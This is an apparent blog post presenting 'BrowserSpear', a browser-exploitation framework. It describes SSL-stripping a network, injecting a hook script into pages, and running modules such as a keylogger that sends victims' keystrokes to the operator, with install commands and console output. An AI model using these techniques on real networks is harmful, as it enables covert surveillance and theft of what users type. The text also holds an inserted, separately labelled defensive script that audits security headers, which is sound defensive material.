With the rise of more IoT devices and other cheap off-the-shelf development platforms, there is an opportunity to optimize the toolsets of Red-teamers, Penetration Testers and Ethical Hackers. To take full advantage of these devices we need our frameworks to be light and flexible. In this article, I want to present a tool that I built called ‘BrowserSpear’. It consists of a basic framework to exploit browsers and is capable of working on all architectures with basic server capacity. Feedback is always welcome.
When demonstrating the need for network security, there are few tools that can really get the appropriate reaction and are easy enough to demo to a crowd of people without actually sending malicious code or using an exploit which might crash the device.
A great demo is to try to downgrade the security of traffic on a network from SSL to unencrypted HTTP. We can do this with tools such as Bettercap, SSLstrip or another variant. After this security downgrade, it is possible to inject extra code into HTTP connections to make the website’s background pink or give an alert: something that is very noticeable to a user and that will get a reaction.
What takes this to the next level is Browser Exploitation. Once an extra script has been injected into a website that a target loaded over an insecure connection, the very famous tool BeEF (Browser Exploitation Framework Project) can control that complete website: the script ‘hooks’ the client and makes it receive commands from BeEF.
Browser Exploitation is nothing new and BeEF is a well-known tool, but it is a bit older and needs a lot of extra dependencies. This is where the usage of old libraries like libv8 and specific Ruby gems starts to become an issue, which makes it almost impossible to install on newer architectures like ARM.
We see many auditing devices built on a mobile architecture such as ARM, for example the WiFi Pineapple, the Packet Squirrel and even your own rooted Android smartphone. These are compact tools that make a great portable and reliable platform. Using these devices on-the-go, or for example a Raspberry Pi as a low-powered server in the cloud, is an excellent use of these new and cheaper devices to audit networks and demonstrate attack vectors.
So what is BrowserSpear?
A device that has the server capacity to run NodeJS will be able to act as a server to ‘spear’ browsers and the complete behavior of the server can be controlled from a shell prompt or scripted beforehand.
BrowserSpear is still under development, but can be found in this GitHub repo. The core functionalities like code delivery and hooking or ‘spearing’ targets are fully working.
How to get started
With NodeJS and NPM installed (through your favourite package manager), clone the GitHub repo and install the following packages:

    git clone https://github.com/larsveelaert/browserspear.git
    npm install websockets prompt uglify-js commander

Starting a console session is as simple as running the script. --help will give you all the extra info you need for advanced configuration.

    $ node browserspear.js --help

    Usage: browserspear [options]

    Options:
      -V, --version             output the version number
      -c, --commandfile <file>  file with commands to run in the console
      -p, --port <port>         Port to listen on
      -i, --ip <ip>             The ip address to use in the reverse connection
      -s, --start               Start a listener immediatly
      -h, --help                output usage informatio

In the BrowserSpear console, you can get a list of available commands by typing ‘help’. Here is an extract:

    >>> help
    Available commands:
    - start | restart
        Restarts the server that serves the spear and provides the socket to connect to
    - set <property> <value>
        Sets a value used by the server or module. ex. 'set LHOST: mydomain.org'
    - options
        List all the values of the options.
    - load <module>
        Loads the functions inside that module. Only one module can be selected at once. ex. 'load keylogger'
    - modules <search>
        Gives a list of all available modules, with an optional searchterm.
    - exec
        Executes the 'exec' function of the current selected module. Ex. send a payload
    - conns
        List all connections to the server
    - help
        Print this help.

The default address of the spear is localhost:1337. Navigating to this address on your local device running the server (started with start) would give you the following output:

    >>> start
    >>> Tue Jan 02 2018 14:11:14 GMT+0000 (UTC) Server is listening on port 1337
    New connection to client at ::1
    >>> conns
    List of connections:
     ::1
Now we can load a module, for example the keylogger, an attack that logs all keystrokes in that browser. By default, the attack is sent to all the clients connected. The client will then record the keystrokes and send them to the server. The attack will stay active, even if the server is restarted or the module is unloaded.

    >>> load keylogger
    >>> keylogger: exec
    Payload sent
    >>> keylogger: [::1] KEYLOGGER:I will now tell you all my secrets

Looking forward to Progressive Web Applications, there is a need to correctly mitigate against this attack vector, because the native APIs already available in the browser are quite powerful and can easily be used against the user (ex. HTML5 webcam, Mic, GPS, Contacts, File access, …). The ever smaller gap between online and offline will create a need for strong security analysis so system access can be strictly controlled.
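On the defending side, a site can check whether its responses carry the headers that blunt the downgrade-and-inject scenario and the device-API abuse described above. The following is an added example, not part of BrowserSpear or the original article; the function names, the 180-day HSTS threshold and the two sample responses are assumptions constructed for illustration.

```javascript
// Added example (not BrowserSpear code): audit response headers for the
// defenses relevant to this article. Header names are real; the sample
// responses and the 180-day HSTS minimum are constructed assumptions.
function parseCsp(value) {
  // "script-src 'self'; connect-src 'self'" -> { 'script-src': ["'self'"], ... }
  const out = {};
  for (const part of String(value || '').split(';')) {
    const [name, ...sources] = part.trim().split(/\s+/);
    if (name) out[name.toLowerCase()] = sources;
  }
  return out;
}

function auditHeaders(headers) {
  const h = {};
  for (const [k, v] of Object.entries(headers)) h[k.toLowerCase()] = v;
  const findings = [];

  // HSTS: once seen over HTTPS, the browser refuses plain HTTP for the host.
  const hsts = /max-age=(\d+)/i.exec(h['strict-transport-security'] || '');
  if (!hsts || Number(hsts[1]) < 15552000) findings.push('hsts-missing-or-short');

  // CSP: restrict script origins and where scripts may open connections.
  const csp = parseCsp(h['content-security-policy']);
  for (const d of ['script-src', 'connect-src']) {
    const src = csp[d] || csp['default-src'];
    if (!src) findings.push(`csp-${d}-unrestricted`);
    else if (src.some((s) => s === '*' || s === "'unsafe-inline'" || /^(http|ws)s?:$/.test(s)))
      findings.push(`csp-${d}-too-broad`);
  }

  // Permissions-Policy: switch off device APIs the site does not use.
  const pp = h['permissions-policy'] || '';
  for (const feature of ['camera', 'microphone', 'geolocation']) {
    if (!new RegExp(`(^|,)\\s*${feature}=\\(\\)`).test(pp)) findings.push(`${feature}-not-disabled`);
  }
  return findings;
}

// Constructed sample responses: one bare, one hardened.
const weak = { 'Content-Type': 'text/html' };
const hardened = {
  'Strict-Transport-Security': 'max-age=31536000; includeSubDomains',
  'Content-Security-Policy': "default-src 'self'; script-src 'self'; connect-src 'self'",
  'Permissions-Policy': 'camera=(), microphone=(), geolocation=()',
};
console.log(auditHeaders(weak));
console.log(auditHeaders(hardened));
```

These headers only protect responses that actually reach the browser over HTTPS; on a connection that has already been downgraded they can be removed in transit, which is why the HSTS check comes first.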
Goals and Roadmap
BrowserSpear will keep expanding its capabilities, aiming towards connection types (including obfuscation/evasion) and pre-configured payloads to make the complete framework very easy to use and very ‘hackable’.
As it is an open-source project, development will happen through its GitHub page. Please feel free to contact me for more info, give feedback or even help to develop the project to its full potential.